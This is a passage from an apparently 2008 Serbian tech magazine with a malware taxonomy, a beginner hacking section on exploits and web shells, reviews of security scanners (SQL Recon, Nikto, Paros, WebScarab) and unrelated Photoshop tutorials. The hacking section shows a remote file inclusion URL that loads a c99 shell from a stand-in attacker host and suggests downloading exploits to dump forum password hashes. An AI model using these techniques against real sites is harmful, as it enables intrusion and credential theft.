korisničkih privilegija što se postiže razbijanjem šifre ili iskorišćavanjem nekog propusta. Zatim se dobijene privilegije koriste za prikupljanje šifri ostalih korisnika da bi se došlo do root (administratorskih) privilegija. Sam pojam potiče sa Unix sistema ali se vremenom počeo koristiti za opisivanje tehnika za skrivanje aktivnosti malware-a na Windows sistemima. 10. ArcBombs trojani su arhivirane datoteke zamišljene za sabotažu dekompresora. Kada se pokuša izvršiti dekompresija arhive, sistem će usporiti, srušiti se ili će disk biti napunjen besmislenim podacima. Ova vrsta malware-a je posebno opasna za servere koji automatski obrađuju sve pristigle podatke. Postoje tri vrste ovih trojana: * arhive sa neispravnim zaglavljem ili podacima koje mogu prouzrokovati rušenje dekompresora pri otvaranju/raspakivanju arhive; * arhive sa ponavljajućim podacima koje mogu biti upakovane izuzetno velikom kompresijom - više GB ponavljajućih podataka može biti kompresovano na svega nekoliko KB; * arhive sa ogromnim brojem identičnih datoteka koje su nakon kompresije zanemarljive veličine u odnosu na raspakovanu arhivu. *** 4. Ostali malware uključuje: 1. programe zamišljenje za pisanje malware-a (constructors); 2. programske biblioteke posebno dizajnirane za korišćenje pri pisanju malware-a; 3. alate za enkripciju čija je funkcija sprečavanje/otežavanje detekcije od strane antivirus programa; 4. "joke" (šala) programe koji ometaju normalan rad kompjutera; 5. programe koji smišljeno dezinformišu korisnika o svojim postupcima u sistemu; 6. ostale programe koji su dizajnirani da (ne)posredno oštete lokalni ili umrežene kompjutere.
Mali majstori hacka Ova rubrika je namenjena iskljucivo u edukativne svrhe. Svako krsenje pravila I zakona snosite sami. Net Majstor nije odgovoran za postupke clanova naseg sajta I citalaca Net Majstor elektronskog magazine.
Exploit & Shell Evo, vidim ljudi traže pojašnjenja za ova dva pojma, pa eto i ja da doprinesem ovom sajtu. Exploiti Klasična Web definicija: programi, najčešće pisani u perlu, koji rade na principu otkrivenih rupa na nekom sajtu. Srpski rečeno, odete na milworm.com ili neki drugi sajt sa kog možete download-ovati exploite i nadjete onaj koji vam treba. Recimo želite da dobijete md5 hashove lozinki svih korisnika na nekom phpbb forumu, naći ćete neki exploit koji koristi rupu u sistemu za logovanje ili u nekom drugom delu koda (phpbb je šupalj kao cigansko rešeto, te se rupe mogu naći bukvalno svugde :=). Za pokretanje exploita, pisanih u perlu, potreban vam je "active perl" (google-ajte malo ;) ). Kod programa sačuvajte u C:\Perl\bin Zatim otvarate cmd i kucate cd c:\ cd perl cd bin exploit.pl naravno, "exploit.pl" menjate sa nazivom fajla u kome se nalazi kod exploita Dalje instrukcije Vam daje sam program, dakle obavezno je poznavanje engleskog, kao za sve na Web-u. Shell Shell se direktno nadovezuje na rupe na sajtovima... Dakle uz odgovarajuće dozvole možete preuzeti potpunu kontrolu nad sajtom. Primer koda radnjive stranice: Dakle, ovo je katastrofalna greška.
Ukoliko se ovakav kod nalazi na stranici: http://www.mojsajt.com/proba.php
jednostavnim definisanjem varijable $stranica bićete u mogućnosti da includeujete bilo šta na sledeći način: http://www.mojsajt.com/proba.php?stranica=http://www.hacker.com/c99.php Autor: SETI_Explorer
SQL Recon alat Baze podataka vrlo su često jedan od najkritičnijih delova informacionog sistema budući da se u njima pohranjuju različite informacije, najčešće od velikog poslovnog značaja. Zato su baze podataka svakako jedna od najzanimljivijih meta za potencijalne napadače, bez obzira da li se radi o napadima s javnog Interneta ili sa interne računarske mreže. Napade na baze podataka moguće je srpovoditi na različite načine, koriscenjem raznih posrednih i neposrednih metoda kao što su npr. iskorištavanje ranjivosti u operativnim sistemima na kojima su pokrenute, iskoriscavanjem ranjivosti u aplikacijama koje pristupaju bazama podataka, lošim podešavanjem prava pristupa, napadima umetanjem SQL koda (eng. SQL injection), iskoriscavanjem propusta u samim bazama i sl. Zbog svih tih mogućnosti kompromitacije te važnosti koje baze podataka imaju, vrlo je važno voditi računa o njihovoj sigurnosti te imati potpunu kontrolu nad njima. SQL Server, odnosno SQL Desktop Edition (MSDE) su Microsoftove baze podataka koje predstavljaju konkurenciju Oracle, MySQL, PostgreSQL, DB2 i drugim bazama. U zadnjih nekoliko godina upravo su SQL Server, odnosno MSDE bili česte mete napada, a jedan od najpoznatijih incidenata svakako je onaj izazvan širenjem poznatog SQL Slammer mrežnog crva koji je ugrozio veliki broj informacionih sistema na Internetu. Takođe, poznati su i brojni drugi sigurnosni propusti unutar navedenih programskih paketa koji su neovlascenim korisnicima omogućavali provođenje različitih malicioznih aktivnosti. Upravo je iz tog razloga mrežnim administratorima i sigurnosnim stručnjacima u Microsoft baziranim okruženjima vrlo važno da imaju potpunu kontrolu nad svim SQL Serverima i MSDE instancama pokrenutim na računarskoj mreži. SQL Recon je besplatni alat firme SpecialOps Security Код: http://www.specialopssecurity.com
koji služi za aktivnu i pasivnu detekciju Microsoft SQL Server i MSDE instanci baza podataka koriscenjem svih poznatih metoda njihove detekcije. Trenutno dostupna verzija je 1.0, a može se naci na Web stranici proizvođača. Instalacija Instalacija alata SQL Recon 1.0 vrlo je jednostavna. Alat je potrebno nabaviti sa pomenute lokacije Код: http://www.specialopssecurity.com/labs/sqlrecon/1.0/down.php
a zavisno od toga da li je na ciljnom računaru instaliran .NET Framework v1.1, moguće je nabaviti verziju koja funkcionise sa ili bez .NET Framework okruženja. Nastavak instalacije provodi se pokretanjem instalacijske datoteke, prihvatanjem zahteva licence i odabira direktorijuma u kojem će SQL Recon pohraniti svoje datoteke.
Konfiguracija Rad s alatom i njegova konfiguracija takođe su vrlo jednostavni. GUI interfejs alata podeljen je u dve kartice: – Scan i – Options. Načini skeniranja Kartica Scan sadrži parametre pomoću kojih je moguće odrediti opseg skeniranja (Slika 1). Moguće je odabrati dva aktivna i jedan pasivni način skeniranja. Aktivna skeniranja mogu se sprovoditi navođenjem područja IP adresa (eng. IP range), gde SQL Recon predefinisano odabira lokalne mrežne postavke koje je moguće promeniti ručnim unosom ili koriscenjem liste IP adresa pohranjene u tekstualnoj datoteci (eng. IP list).Zahtevni nedostatak aktivnih skeniranja jest da će takva skeniranja gotovo sigurno biti zabeležena ukoliko na mreži postoje sistemi za detekciju neovlascenih aktivnosti (host based IDS ili network based IDS). Pasivni način skeniranja uklanja ovaj nedostatak, pa se kod SQL Recon paketa ujedno naziva i "nevidljivi" način rada (eng. stealth). Nevidljivi način rada koristi indirektne metode pronalaženja instanci SQL Servera. Drugi deo Scan kartice služi za pregled rezultata skeniranja.
Slika 1: Podešavanje načina skeniranja i odabir IP adresa Podešavanje parametara skeniranja Kartica Options omogućava podešavanje parametara skeniranja. Kartica je podeljena u četiri dela: – Active Recon Options – služi za podešavanje parametara aktivnih skeniranja, – Passive Recon Options – služi za podešavanje parametara pasivnog skeniranja, – General Options – služi za podešavanje opstih parametara i opcionalno podešavanje alternativnih korisničkih podataka.
Slika 2: Podešavanje parametara skeniranja Podešavanje parametara aktivnih skeniranja podrazumeva uključivanje ili isključivanje sledećih načina aktivnog skeniranja: SQL Server Resolution Service Probe (UDP) –temelji se na standardnoj "SQL ping" detekciji slanjem UDP paketa na port 1434 udaljenog računara. Registy Probe (REG) –proverava registry datoteku udaljenog računara i traži instance SQL Servera. Registry probe zasad radi samo s predefinisanim (eng. default) verzijama SQL Servera i zahteva administrativna ovlascenja na udaljenom računaru. WMI Enumeration Probe (WMI) – koristi WMI (eng. Windows management instrumentation) upite za detekciju instanci SQL Servera. Pouzdani rezultati ovog načina skeniranja mogu se dobiti jedino uz administrativneo ovlascenje na udaljenom računaru. TCP Probe (TCP) – koristi standardno skeniranje TCP portova 1433 (predefinisani port za SQL Server i MSDE instance) i 2433 (predefinisani SQL Server port ukoliko je na serveru uključena "hide server" mrežna opcija). Service Control Manager Probe (SCM) – za skeniranje koristi se Service control manager servis na udaljenom računaru. Za ovu vrstu skeniranja potrebne su korisnička ovlascenja na udaljenom računaru. Attempt Login Probe (SA) – za razliku od ostalih vrsta skeniranja, koja detekciju SQL Servera ili MSDE instanci sprovode isključivo na temelju odgovarajućih odgovora udaljenih računara, ova metoda skeniranja uključuje i pokušaj prijave na udaljenu instancu koriscenjem predefinisanog "SA" korisničkog računa. Ovakav način skeniranja funkcionise u slučajevima kad ostale metode ne daju očekivane rezultate. Podešavanje parametara pasivnog skeniranja podrazumeva sledeće opcije: Browser Service Probe (BRO) – proverava Browser Service servis udaljenog računara. Iako ne daje detaljne rezultate, ovo skeniranje može biti korisno za neopaženo otkrivanje instanci SQL Servera Active Directory Probe (AD) – šalje upite Active Directory servisu i traži registrovane instance SQL Servera. Pošto registracija SQl Servea unutar Active Directory-ja nije obvezna,
ovaj način skeniranja otkri će samo registrovane SQL Servere. Takođe, za koriscenje ovog načina skeniranja potrebne su korisnička ovlascenja na ciljnom domenu. Podešavanje opstih parametara uključuje podešavanje onih postavki koje skeniranje mogu učiniti efikasnijim: Disable SSNetlib Version Check Parent – isključuje proveru verzije SSNEtlib.dll (intrfejs SQL Server engine-a prema protokolima nižih slojeva) biblioteke. Isključivanje ove opcije može umanjiti opasnost od generisanja upozorenja od strane IDS sistema. Disable ICMP check – isključuje koriscenje ICMP provjera udaljenih računara. Isključivanje ove opcije pomaže kod računara koji blokiraju ICMP pakete, no može značajno usporiti rad SQL Recon alata. Enable Debug Log – omogućava generisanje log zapisa u cilju detaljne provere odgovora koje SQL Recon program dobija prilikom skeniranja. ICMP Timeout – omogućava podešavanje vremena koliko će SQL Recon čekati ICMP odgovor udaljenog računara. Na brzim lokalnim mrežama s velikim brojem računara smanjivanje ove vrednosti može ubrzati rad, dok se kod sporih modemskih veza preporučuje podizanje njene vrednosti. UDP Source Port – omogućava ručno podešavanje izvorišnog porta s kojeg će se slati paketi za skeniranje. Na ovaj način nekad je moguće zaobići vatrozide koji filtriraju pakete (npr. podešavanjem source porta na UDP 53). Alternate Credentials – omogućava podešavanje alternativnih korisničkih informacija. Podešavanje tih parametara koristi se obično kod skeniranja koja zahtijevaju ovlascenja na udaljenim računarima ili na ciljnoj domeni. Rad Nakon što je konfiguracija podešena, moguće je, pritiskom na gumb Scan, kartice Scan pokrenuti skeniranje. Zavisno od broja IP adresa koje su uključene u skeniranje, konfiguraciji mreže i ICMP postavkama, sam proces skeniranja može trajati duzee ili kraće. Po završenom skeniranju u desnom delu prozora kartice Scan pojavit će se sve detektovane SQL Server ili MSDE instance. Odabirom bilo koje od njih moguće je pregledati detaljne informacije o detektovanoj instanci, isto kao i načine skeniranja koji su bili uspešni.
Slika 3: Pregled informacija od detektovane SQL Server (MSDE) instance Dobijene rezultate moguće je pohraniti za kasniju analizu (izbornik File -> Save -> Full Report), a moguće je koriscenje i pomoći pri radu (Help), pri čemu je potrebno biti povezan na Internet, budući da Help naredba otvara Web stranicu na adresi http://www.specialopssecurity.com/labs/sqlrecon/1.0/doc.php
Uopsteno, rad SQL Recon-a je pouzdan, a nisu uočene nikakve nestabilnosti niti problemi pri radu, što je ponekad uobičajeno kod alata ovog tipa. Ukoliko se za detekciju SQL Server i MSDE instanci koriste metode koje ne podrazumijevaju korisnička ili administrativna ovlascenja, u nekim slučajevima je moguće da detekcije neće biti pozitivne, no u većini slučajeva alat daje zadovoljavajuće rezultate. Mali nedostatak alata jeste dosta ograničen način odabira IP adresa. Kliknite na slike radi uvecanja i boljeg prikaza!
Alati za ispitivanje sigurnosti web-aplikacija 1. Program Nikto Program Nikto je najpopularniji i besplatno dostupan skener web ranjivosti. Код: http://www.cirt.net/nikto2
Nikto je PERL program osmišljen kako bi pronašao razne vrste sigurnosnih problema web servera, uključujući: • Greške u konfiguraciji servera i programa • Izvorne datoteke i programe • Nesigurne datoteke i programe • Zastarele servere i programe Izgrađjen je na LibWhisker biblioteci i može se pokrenuti na bilo kojoj platformi koja ima Perl runtime, a podržava SSL, posrednike (eng.Proxy), autentikaciju servera, IDS (eng. Intrusion Detection System) i sl. Može biti obnovljen automatski iz dela za naredbu, s time da podržava izborno obnavljanje ažurirane verzije podataka natrag na izvornu verziju. Bilo koji sistem koji podržava osnovne PERL instalacije može pokrenuti program Nikto. Potrebno je testirati na: 1) Windows (koristeći ActiveState Perl) 2) Mac OSX 3) Raznim Linux i Unix instalacijama (uključujući i RedHat, Solaris, Debian, Knoppix itd.) Trenutna verzija ovog programa je takođje distribuirana kao Windowsova izvršna datoteka za koriscenje na Win32 platformi (ne zahteva instalaciju PERL). Jedini zahtevani perl modul koji ne dolazi standardno je biblioteka LibWhisker. Nikto dolazi konfigurisan da koristi lokalnu LW.pm datoteku (u «plugins» direktoriju),
ali korisnici mogu promeniti postavke. Za SSL podršku mora biti instaliran Net:: SSLeay perl modul (što opet zahteva OpenBSD na UnixWare platformama). Windows podrška za SSL zavisi od instalacijskog paketa, ali poznato je da postoji za ActiveState Perl. Program Nikto ne pruža graficki interface korisnicima što je za većinu korisnika veliki nedostatak. Instalacija, održavanje i korišćenje Postupak instalacije pokreće se jednostavnim otvaranjem preuzetih datoteka (uz pretpostavku standardne OS/perl instalacije): Код: tar -xvf nikto-current.tar.gz tar-xvf nikto-current.tar.gz gzip -d nikto-current.tar gzip-d nikto-current.tar
Nikto može biti automatski ažuriran, uz pretpostavku da je računar na kojem je instaliran povezivan sa Internetom, pa je potrebno samo jednostavno pokrenuti Nikto s naredbom za ažuriranje. Код: perl nikto.pl -update perl nikto.pl-update
Osnovno skeniranje zahteva odgovor jednostavnog server preko porta 80, ako drugačije nije specificirano. Server može biti IP adresa ili DNS naziv, a potrebno je koristiti -h (-host) opciju. Provera servera na adresi IP 192.168.0.1 na TCP portu 80 glasila bi: Код: perl nikto.pl -h 192.168.0.1 perl nikto.pl-h 192.168.0.1
Za proveru preko drugog porta potrebno je navesti broj porta s -p (-port) opcijom npr. provera server na adresi IP 192.168.0.1 na TCP portu 443: Код: perl nikto.pl -h 192.168.0.1 -p 443 perl nikto.pl-h 192.168.0.1-p 443
Domaćini (serveri koji se testiraju), priključci i protokoli mogu takođe biti navedeni pomoću celih URL sintaksi, npr: Код: Perl nikto.pl -h https://192.168.0.1:443/ perl nikto.pl-h https://192.168.0.1:443/
Ako se radi o SSL serveru pomoću opcije -SSL ubrzava se test. Код: perl nikto.pl -h 192.168.0.1 -p 443 -ssl perl nikto.pl-h 192.168.0.1-p 443-SSL
Program Nikto može skenirati više priključaka navođenjem popisa priključaka u -p (-port) opciju.
Portovi mogu biti navedeni kao niz (tj. 80-90) ili kao lista brojeva odvojena zarezima (tj., 80,88,90). Primer ispitivanja portova 80, 88 i 443: Код: perl nikto.pl -h 192.168.0.1 -p 80,88,443 perl nikto.pl-h 192.168.0.1-p 80,88,443
Moguće je skenirti više domaćina i putem tekstualnih datoteka serverovih imena ili IP adresa. Datoteka servera mora biti formatirana tako da je zapisan jedan domaćin po retku s tim da je broj porta naveden na kraju svakog retka. Portovi mogu biti odvojeni od drugih priključaka preko dvotočke ili zareza. Primer ispravne datoteke : Код: 192.168.0.1:80 192.168.0.2,80 192.168.0.3 192.168.0.1,80,443 192.168.0.1:80:443 localhost:8888 localhost: 8888
Test može biti izveden i ako računar na kojem je pokrenut Nikto ima samo pristup do ciljanog servera preko HTTP posrednika. Tada je potrebno postaviti proxy varijable, a zatim pokrenuti Nikto s -u (-useproxy) opcijom. Sve veze koje se odvijaju preko HTTP proxy biće navedene u konfiguracijskuoj datoteci. Код: perl nikto.pl -h 192.168.0.1 -p 80 -u perl nikto.pl-h 192.168.0.1-p 80-u
Program Nikto omogućava izlaz u tri oblika: tekstualni, CSV (eng. comma-separated values) ili HTML. Koriscenjem -o (-output) moguće je zadati izlazni format specificiran s -F (-Format). Ako se format ne zada podrazumeva se tekstualni oblik. Ostale opcije Program Nikto sadrži brojne opcije koje se mogu dobiti pokretanjem programa sa opcijom -h (help). Takođje, jedna od pogodnosti su i tehnike promene (eng. mutation) koje omogućavaju kombinovanje testova ili pogađjanje vrednosti. Koriste se navođjenjem odgovarajućeg broja koji definise vrstu testa: 1 - Testirati sve datoteke sa svim korenskim direktorijumima 2 - Pogađjanje lozinki za imena datoteka 3 - nabrajanje imena korisnika putem Apache sistema 4 - nabrajanje imena korisnika putem cgiwrap programa Program Nikto takođje sadrži razne opcije prikaza: 1 - Prikaz preusmeravanja 2 - Prikaz primljenih kolačića (eng. Cookies) 3 - Prikaz svih 200/OK odgovora 4 - Prikaz URL adresa koje zahtevaju proveru autentičnosti D - Debug Output V - Verbose Output
Postoje i načini poboljšanja skeniranja koji smanjuju broj testova na ciljani računar pomoću -T (Tuning) opcije. Postoje sljedeće –T opcije: 0 - Poslane datoteke (eng. upload) 1 - Zanimljive datoteke 2 - Greške u konfiguraciji / Izvorne datoteke 3 - Otkrivanje informacija 4 - Napadi podmetanjem (XSS / skripte / HTML) 5 - Udaljeni pristup datotekama – unutar web korena 6 - Denial of Service 7 - Udaljeni pristup datotekama – udaljen server 8 - Pokretanje naredbi 9 - SQL Injection a - Zaobilažene autentikacije b - Identifikacija programa c - Udaljeno uključivanje izvora x - Invertirane opcije poboljšanja 2. Program Paros proxy Program Paros je alat za analiziranje sigurnosti web aplikacija napisan u programskom jeziku Java. Koristeći Paros posrednik (eng. proxy) moguće je modifikovati sve HTTP podatke izmeđju korisnika i servera, uključujući kolačiće (eng. cookies) i polja za unos. Dostupan je za Microsoft Windows, UNIX, Linux te Aplle Mac OS X operativne sisteme, a korišcenje zahteva prethodnu instalaciju JRE 1.4.x. (Java Run Time Enviroment). Korisnici Windows operativnog sistema trebaju samo pratiti uputstva za dalju instalaciju, dok korisnici UNIX (i drugih) operativnih sistema trebaju ručno otpakovati datoteke u novi direktorijum i pokrenuti .jar datoteku. Paros pruža pregledni korisnički interface kao što je prikazano na slici 3. Slika3. Korisničko sučelje programa Paros
Osnovne funkcije Pauk (eng. spider) ulazi u web stranice i prikuplja što je više moguće URL adresa, što omogućava bolje razumevanje hijerarhije web stranica.
Uključuje: • Ulazak u HTTP i HTTRS web stranice temeljene na danom URL • Podrška kolačićima • Podrška zamene posrednicima • Automatsko dodavanje URL adresa u stablo hijerarhije web stranice za potrebe kasnijeg skeniranja Ograničenja: • Nemogućnost ulaženja u SSL web stranice sa nepravilnim sertifikatom • Nemogućnost prepoznavanja nekih posebno oblikovanih URL adresa u HTML stranicama • Nemogućnost pronalaženja URL adresa pisanih u Javascript Funkcija skeniranja je skenirati servere temeljene na hijerarhiji web stranica, a takođje moguće je pretraživati greške u konfiguraciji. Trenutno, program Paros ima sledeće opcije: • Provera da li je uključena opcija PUT u direktorijumima servera • Provera da li je moguće pregledati direktorijume server • Provera da li postoje datoteke koje su zastarele • Provera za XSS • Provera da li postoje izvorne datoteke na server Kako su sve provere temeljene na URL adresama u hijerarhiji web stranica, skener proverava svaku adresu za svaki nedostatak. Kao filter program Paros obavlja: • Otkrivanje pojave prethodno definisanih obeležja u HTTP porukama, te obaveštavanje korisnika • Zapis informacija koje su zanimljive (npr. kolačići) Kako svaki filtar izvodi svaku HTTP poruku, korišcenje svih može usporiti rad browsera. Dostupni filtri: • LogCookie - zapis svih primljenih kolačića poslanih iz browsera do servera • LogGetQuery - zapis svih HTTP GET upita poslanih iz browsera • LogPostQuery - zapis svih HTTP POST upita poslanih iz browsera • CookieDetectFilter - obavestenje korisnika o postavljenoj opciji „Set-Cookie“ u HTTP odgovoru • IfModifiedSinceFilter - uklanjanje polja „If-Modified-Since“ i „If-None-Match“ u HTTP zahtevu Ostale funkcije: • Dekodiranje podataka u drugi oblik: Base64, SHA1 i MD5 • Hvatanje HTTP zahteva i odgovora - Uključivanjem opcije „Trap Request“ u polju „Trap“ prate se svi zahtevi, dok se uključivanjem opcije „Trap Response“ prate odgovori.
3. Program WebScarab WebScarab je okvir za analizu aplikacija koji komuniciraju pomoću HTTP i HTTPS protokola, napisan u programskom jeziku Java. U najčešćem obliku, alat WebScarab radi kao zadržavajući posrednik (eng. intercepting proxy), čime omogućava operateru pregled i izmenu zahteva kreiranih u browseru pre slanja serveru te odgovora koje vraćaju server (pre primanja od stranebrowsera). Operater može takođje pregledati i konverzacije (zahteve i odgovore) koji su prolazili kroz WebScarab. WebScarab je osmišljen kao alat za potrebe otkrivanje događjaja HTTP(S) aplikacija, bilo da omogući programerima ispravljanje grešaka u problemima ili da stručnjacima za sigurnost identifikuju ranjivosti. Nakon preuzimanja potrebnih datoteka instalacija se obavlja na sljedeći način: Код: Linux: java -jar ./webscarab-selfcontained-[numbers].jar Windows: pokretanje .jar datoteke
Dostupna je verzija i za operativni system Mac OS X , a postoji i Java Web Start verzija (aplikacija kojoj se pristupa putem webinterface-a). Korisnički interface programa prikazano je na slici 4. Slika4. Korisnički interface programa WebScarab
Osnovne funkcije Alat WebScarab pruža brojne dodatke koje uključuju: • Delici (eng. fragments) - izvučen HTML sadržaj HTML stranice kao da se radi s Proxy-jem • Posrednik (eng. Proxy) - prati promet izmeđju browsera i web server (HTTP i kriptovani HTTPS promet) stvarajući SSL vezu, umesto direktnog povezivanja. • Ručno presretanje - omogućuje korisniku izmenu HTTP i HTTPS zahteva i odgovora, pre nego dođju do proxz-ja ilibrowsera. • Beanshell - dozvoljava izvršavanje kompleksnih operacija na zahteve i odgovore. • Otkrivanje skrivenih polja - ponekad je lakše modifikovati skrivena polja (eng. hidden field) u stranici, nego zadržati zahtev nakon što je poslan. Ovaj dodatak omogućava jednostavne promene skrivenih polja u HTML stranicama u tekstualna polja čineći ih vidljivima. • Simulator širine pojasa - omogućava korisniku testiranje sporije mreže te testiranje učitavanja web stranice (npr. pristup modemom). • Spider – identifikuje nove URL-ove na ciljnoj stranici • Ručni zahtev - uređjivanje i ponavljanje prethodnih zahteva, ili stvaranje potpuno novih. • SessionID analiza - prikuplja i analizira nekoliko kolačića • Scripted - operateri mogu koristiti BeanShell za pisanje skripte za kreiranje zahteva i
dostaviti je server pa skripta tada može izvesti analizu odgovora. • Parametri fuzzer – obavljaju automatsku zamenu za vrednosti parametra koji neće proći proveru parametara (eng. parameter validation), dovodeći do ranjivosti (poput Cross Site Scripting i SQL Injection). • Pretraga - omogućuje korisniku da oblikuje proizvoljni BeanShell izraz da identifikuje konverzacije koje bi trebale biti prikazane u popisu. • SOAP - dodatak koji obrađuje WSDL, te predstavlja razne funkcije i potrebne parametre koji se mogu uređjivati pre slanjaserveru. • Proširenja (eng. Extensions) – automatizuju pretrage za datoteke koje su zabunom ostale u korenskom direktorijumu server. • XSS / CRLF - pretražuje korisnički kontrolisane podatke u zaglavlju i telu HTTP odgovora kako bi identifikovali potencijalne CRLF injection i reflektovane cross-site scripting (XSS) ranjivosti.
Photo Shop (tutoriali) Retro background - Autor: Kecap
Slika koju sam dobio posle malo bojenja layera!
Mozete josh dodati Filter > Render > Lens Flare pa podesite kako vam odgovara! Ovde sam vam postavio sliku kako izgleda kada flare uradite na layeru na kom su iscrtane linije ali mozete pokusati da stavite umesto na taj layer na background layer.
Animacija u PS CS3 Da biste dobili panel za animaciju idite na Windows>Animation
E ovako imate 3 osnovne stvari za animaciju u PS CS3 u opciji Tween!!! Znaci Opacity,Postition i effects!
Idemo Redom Opacity Sluzi da vam se objekat koji vam je u Frameu postepeno pojavljuje ili nestaje!! Npr>
Napisite neki Text na vasem dokumentu!!!
i dodaje novi Frame!!
!! E sada kliknite na 1 frame i stavite text layer za nevidljiv a u 2 frameu ga ostavite da bude vidljiv!!!! Znaci Layer panel za 1 frame ce izgledati ovako:
a za 2 layer ovako :
Na kraju ce Animation panel izgledati ovako!>
Znaci frameovi su kao layeri dobro morate paziti na njih!Za svaki pokret nekog objekta mora imati bar 5 ili vise frameova da ne bi seckalo! Sada selektujte oba framea u Animation Panelu i pritisnite Tween!
zatim u Tween prozoru cekirajte Opacity a onstale odcekirajte i stavite 20 frameova za dodavanje!
stisnite OK!!! Sada idite na File>Save For Web^Devices podesite kako vam odgovara ali mora biti u gifu i kliknite save!!!!! PAZNJA: ovaj sistem cuvanja animacije je isti za svaku animaciju tako da je necu vise ponavljati!!!! dobili smo
kliknite na sliku da biste videli animaciju Paznja: Obratite paznju na opciju u donjem levom uglu imate Once i Forever!Once stavite ako zelite da animacija samo jednom animira i stane na zadnjem frameu a forever ce se stalno vrteti!U ovom primeru je stavljen ONCE~!!!!
PS-CS3 Animation: -=[EKG LINE]=-
(Kliknite OVDE da biste videli tutorial.) Rezultat bi trebao da izgleda ovako, samo brze...
Naravno, ukoliko se poveca maskirano podrucje EKG ostavlja veci trag... Sve se da korigovati po potrebi...
Autor: Sergej
Efekat Slaganja Fotografija!
(Kliknite OVDE da biste videli tutorial.)
Nasi sajtovi Re.RS Vas sajt sa nama ima buducnost ! RS HOSTING je prvi domaci provajder koji pored standarnih placenih hosting planova svojim clanovima nudi i besplatan domen + hosting pod odredjenim uslovima. RS Hosting koristi najsavremenije hosting tehnologije radi sigurnosti vasih projekata. Korisnici usluga RS Hostinga imaju uvid u status svojih naloga putem Klijent Panela (cPanel-a).Svaki nalog moze koristiti brojne opcije ponudjene u cPanelu.Podrzane su sve php,perl,cgi skripte koristeci MySql base za rad istih. Sajt je u izradi i ocekujemo otvaranja vrata novim clanovima do kraja meseca. S postovanjem RS HOSTING Tim !
Copyright © 2008 Net Majstor – All right reserved.
View more...
Comments